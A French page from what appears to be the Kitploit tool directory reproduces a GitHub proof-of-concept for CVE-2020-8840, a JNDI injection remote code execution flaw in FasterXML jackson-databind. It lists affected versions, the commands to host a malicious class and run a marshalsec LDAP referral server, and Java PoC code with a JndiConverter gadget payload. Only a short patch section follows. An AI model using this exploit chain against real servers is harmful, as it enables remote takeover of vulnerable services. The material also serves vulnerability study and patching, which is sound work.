Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-8840 — CVE-2020-8840:FasterXML/jackson-databind vulnérabilité d'exécution de code à distance | Kitploit
Outils/GitHubGitHub/fairyming/cve-2020-8840
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubfairyming/cve-2020-8840

CVE-2020-8840

CVE-2020-8840:FasterXML/jackson-databind vulnérabilité d'exécution de code à distance

Voir le dépôt
377il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-8840 : Vulnérabilité d'exécution de code à distance dans FasterXML/jackson-databind

0x00 Introduction

jackson-databind est une bibliothèque de traitement JSON appartenant au groupe de projet FasterXML.

0x01 Aperçu de la vulnérabilité

Le 19 février, NVD a publié un avis de sécurité divulguant une vulnérabilité d'exécution de code à distance dans jackson-databind due à une injection JNDI (CVE-2020-8840), avec un score CVSS de 9,8. Dans les versions affectées de jackson-databind, en raison de l'absence de certaines classes de la liste noire xbean-reflect/JNDI, telles que org.apache.xbean.propertyeditor.JndiConverter, un attaquant peut utiliser une injection JNDI pour exécuter du code à distance et obtenir le contrôle du serveur (au niveau du service Web).

0x02 Versions affectées

2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2

0x03 Mise en place de l'environnement

  • Version JDK : 1.81 【L'utilisation de LDAP et RMI avec l'injection JNDI impose certaines exigences sur la version JDK. À travers l'image ci-dessous, nous pouvons clairement connaître le moment de la correction par Oracle.

20190606014739_69118.jpg

  1. Placez la classe malveillante déjà compilée dans le répertoire du serveur Web

WX20200223-135435@2x.png

Utilisez simplehttp pour mettre en place un service Web

root@kitploit:~
python -m SimpleHTTPServer 8080

image.png

  1. Démarrez le service LDAP

Ici, nous utilisons marshalsec. Lien GitHub : https://github.com/mbechler/marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit

image.png

  1. Créez un projet Java et importez le fichier JAR de la version vulnérable

WX20200223-135855@2x.png

0x04 Exploitation de la vulnérabilité

  • Toute la chaîne d'exploitation
root@kitploit:~
poc --> ldap --> http
  • poc
root@kitploit:~
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
    public static void main(String args[]) {
        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/Exploit\"}]";

        try {
            mapper.readValue(json, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}
  • Exécutez directement le POC pour charger la classe malveillante sur le serveur Web via LDAP, entraînant une exécution de code à distance

WX20200223-140159@2x.png

0x05 Correctif

  1. Mettez à niveau jackson-databind vers les versions 2.9.10.3, 2.8.11.5, 2.10.x

  2. Vérifiez si le projet utilise xbean-reflect. La cause principale de cette vulnérabilité est l'existence d'une chaîne d'exploitation spéciale dans xbean-reflect permettant à un attaquant de déclencher un chargement de classe distant via JNDI. Supprimer xbean-reflect peut atténuer l'impact de la vulnérabilité.

Liens de référence :

https://cert.360.cn/warning/detail?id=1fe3b5ea888750006e0d64fb0df1e6ee

https://github.com/jas502n/CVE-2020-8840

Télécharger l’outil